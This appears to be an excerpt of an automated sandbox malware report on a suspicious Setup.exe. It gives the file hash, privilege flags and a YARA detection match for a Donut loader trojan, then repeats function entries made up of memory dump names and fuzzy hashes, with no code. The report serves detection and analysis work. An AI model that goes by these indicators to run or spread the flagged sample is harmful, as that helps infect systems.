                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:75'077'735 bytes
                                                                                                              MD5 hash:2FBED9C7F4E671459BA52391D1D2975D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Yara matches:
                                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Non-executed Functions

                                                                                                                Function 00793044 Relevance: .4, Instructions: 399COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2231452822.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2202431157.000000000078D000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_78d000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3aaabdd48c7c4b557e902866214a5035934f96e822234e7a329f03605e7c2a9e
                                                                                                                • Instruction ID: ccf782c09b3791655889c1bf279ea6d0488c975ff733124f615e9b4a4117a5ec
                                                                                                                • Opcode Fuzzy Hash: 3aaabdd48c7c4b557e902866214a5035934f96e822234e7a329f03605e7c2a9e
                                                                                                                • Instruction Fuzzy Hash: F3B1B79284E3C14FCB138B749CB9555BF70AE2321472E86CFC8D68F4A3E249590AD767
                                                                                                                Function 00793044 Relevance: .4, Instructions: 399COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2231452822.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Offset: 00792000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2202431157.000000000078D000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_78d000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3aaabdd48c7c4b557e902866214a5035934f96e822234e7a329f03605e7c2a9e
                                                                                                                • Instruction ID: ccf782c09b3791655889c1bf279ea6d0488c975ff733124f615e9b4a4117a5ec
                                                                                                                • Opcode Fuzzy Hash: 3aaabdd48c7c4b557e902866214a5035934f96e822234e7a329f03605e7c2a9e
                                                                                                                • Instruction Fuzzy Hash: F3B1B79284E3C14FCB138B749CB9555BF70AE2321472E86CFC8D68F4A3E249590AD767
                                                                                                                Function 00793044 Relevance: .4, Instructions: 399COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2231452822.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Offset: 00793000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2852643199.0000000000798000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_78d000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4ee310df1c9b927dd2c23f15d9bedc102c54e774c343281def3c7e8032b1f7b0
                                                                                                                • Instruction ID: ccf782c09b3791655889c1bf279ea6d0488c975ff733124f615e9b4a4117a5ec
                                                                                                                • Opcode Fuzzy Hash: 4ee310df1c9b927dd2c23f15d9bedc102c54e774c343281def3c7e8032b1f7b0
                                                                                                                • Instruction Fuzzy Hash: F3B1B79284E3C14FCB138B749CB9555BF70AE2321472E86CFC8D68F4A3E249590AD767
                                                                                                                Function 0072B659 Relevance: .1, Instructions: 123COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2202807145.0000000000729000.00000004.00000020.00020000.00000000.sdmp, Offset: 0072B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_729000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9488ae698026c6ea9d9bb62c2b9aff96aca31eec736d9b2548d590d4e8af9307
                                                                                                                • Instruction ID: b3012ae07565ff2bd8b064fe12a4c77d19b6073903796bc98ef9391fd798f058
                                                                                                                • Opcode Fuzzy Hash: 9488ae698026c6ea9d9bb62c2b9aff96aca31eec736d9b2548d590d4e8af9307
                                                                                                                • Instruction Fuzzy Hash: 8C417E7140E7D29FC7039B348C61A927FB5AE4731471E45DAD4C0CF163E22A595AC762
                                                                                                                Function 0072B659 Relevance: .1, Instructions: 123COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2202807145.0000000000729000.00000004.00000020.00020000.00000000.sdmp, Offset: 00729000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_729000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9488ae698026c6ea9d9bb62c2b9aff96aca31eec736d9b2548d590d4e8af9307
                                                                                                                • Instruction ID: b3012ae07565ff2bd8b064fe12a4c77d19b6073903796bc98ef9391fd798f058
                                                                                                                • Opcode Fuzzy Hash: 9488ae698026c6ea9d9bb62c2b9aff96aca31eec736d9b2548d590d4e8af9307
                                                                                                                • Instruction Fuzzy Hash: 8C417E7140E7D29FC7039B348C61A927FB5AE4731471E45DAD4C0CF163E22A595AC762
                                                                                                                Function 0075CBD1 Relevance: .1, Instructions: 109COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2252229474.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Offset: 0075A000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2202431157.000000000075A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_75a000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 342ecd7a069d2326827b3f5889e5621e7253a701a40c385448bd4a93b9abdbc3
                                                                                                                • Instruction ID: 20e9ddc9eea20f6a43232e6ccccaf4fb86da1ee83ec0c9f254c1c1568d73af89
                                                                                                                • Opcode Fuzzy Hash: 342ecd7a069d2326827b3f5889e5621e7253a701a40c385448bd4a93b9abdbc3
                                                                                                                • Instruction Fuzzy Hash: FE41F33140A7C18FC717CF78C8615CA7FB2EF8731575988EAC8C19E027C26A695ACB52
                                                                                                                Function 0075CBD1 Relevance: .1, Instructions: 109COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2252229474.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Offset: 0075C000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_75a000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 342ecd7a069d2326827b3f5889e5621e7253a701a40c385448bd4a93b9abdbc3
                                                                                                                • Instruction ID: 20e9ddc9eea20f6a43232e6ccccaf4fb86da1ee83ec0c9f254c1c1568d73af89
                                                                                                                • Opcode Fuzzy Hash: 342ecd7a069d2326827b3f5889e5621e7253a701a40c385448bd4a93b9abdbc3
                                                                                                                • Instruction Fuzzy Hash: FE41F33140A7C18FC717CF78C8615CA7FB2EF8731575988EAC8C19E027C26A695ACB52
                                                                                                                Function 0074D999 Relevance: .1, Instructions: 77COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2202431157.0000000000745000.00000004.00000020.00020000.00000000.sdmp, Offset: 00745000, based on PE: false
                                                                                                                • Associated: 00000000.00000003.2219391647.0000000000745000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_745000_Setup.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 86965024f16a9496b8ee297476960e822b886593cd7e93b89f97e052be941070
                                                                                                                • Instruction ID: 5608afd19137a2e1c23c7a2411ee19b9b235e474e71486df52acc0bd7bb07288
                                                                                                                • Opcode Fuzzy Hash: 86965024f16a9496b8ee297476960e822b886593cd7e93b89f97e052be941070
                                                                                                                • Instruction Fuzzy Hash: D42134651092D08FC313CF34D494A82BFA1FF8B31639E80DCC9C18F427C2A56942CB42